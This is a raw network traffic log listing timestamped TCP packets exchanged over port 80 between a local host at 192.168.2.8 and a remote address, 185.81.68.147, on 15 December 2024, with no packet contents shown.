                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.800681114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.800761938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.801302910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.801412106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.801503897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.802150965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.802310944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.802411079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.803200006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.803416967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.803503990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.804086924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.804209948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.804297924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.804944038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.805027962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.805181026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.805665970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.805744886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.805993080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.806339979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.806478024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.806718111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.807168007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.807269096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.807476997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.808106899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.808203936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.808305025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.808934927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.809029102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.809130907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.809691906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.809813976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.809932947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.810544968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.810657024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.810735941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.811352015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.811521053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.811608076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.812207937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.812309980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.812397957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.813047886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.813167095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.813266039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.814013004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.814208984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.814270020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.814938068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.815037012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.815644979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.815690041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.815710068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.815742970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.816392899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.816504955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.816792965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.817291021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.817397118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.818063021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.818121910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.818157911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.818423033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.818892956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.819047928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.819467068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.819751978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.819853067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.820153952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.820596933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.820729971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.820815086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.821408987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.821557045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.821712971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.822253942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.822354078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.822474957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.823306084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.823446989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.823545933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.824326992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.824414015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.824522018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.825165987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.825272083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.825347900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.825860023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.825920105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.826041937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.826474905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.826536894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.826625109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.827359915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.840564013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.840583086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.840727091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.840872049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.840967894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.841062069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.841136932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.841227055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.841885090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.842061996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.842159033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.842854977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.842967033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.843058109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.843609095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.843696117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.843786955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.844477892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.844561100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.844783068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.845159054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.845330954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.845411062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.845989943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.846101999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.846180916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.846816063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.846925974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.847584963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.847944021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.847995996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.848902941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984110117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984138966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984215975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984272003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984322071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.984366894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.985014915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.985130072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.985205889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.985888004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.985990047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.986079931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.986797094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.986879110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.986998081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.987685919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.987813950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.988466024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.988557100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.988584995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.988850117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.989204884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.989350080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.989454031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.990220070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.990391970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.990489960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.991553068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.991631985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.991720915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.992258072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.992347002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.992423058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.992889881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.992975950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.993057013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.993628979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.993690968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.993776083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.994277954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.994469881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.994550943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.995243073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.995342970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.995430946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.995843887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.995951891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.996048927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.996690035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.996803999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.996884108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.997525930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.997636080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.997714996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.998373032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.998487949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.998569012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.999325037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.999460936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.999541044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.000072956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.000189066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.000272036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.001009941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.001107931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.001185894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.001923084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.002008915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.002088070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.002643108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.002794981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.002872944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.003412962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.003660917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.003740072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.004221916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.004266024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.004353046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.005053997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.005171061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.005258083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.006068945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.006140947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.006232977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.006985903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.007077932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.007191896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.007613897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.007738113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.007848024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.008358955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.008450985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.008559942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.009238005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.009313107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.009418964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.010087967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.010200024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.010292053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.010859013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.010984898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.011058092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.011697054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.011794090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.011874914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.012546062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.012635946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.012713909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.013717890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.013935089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.014014959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.014506102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.014581919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.014659882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.015129089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.015224934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.015302896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.015866041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.015985012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.016066074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.016881943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.017009974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.017095089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.017853975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.017961979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.018042088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.018707037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.018785954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.018876076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.019521952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033040047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033104897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033128977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033401966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033459902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.033509016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.034255981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.034311056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.034323931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.035109997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.035206079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.035305977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.035913944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.036005020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.036127090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.036731958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.036798000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.036829948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.037583113 CET8049709185.81.68.147192.168.2.8
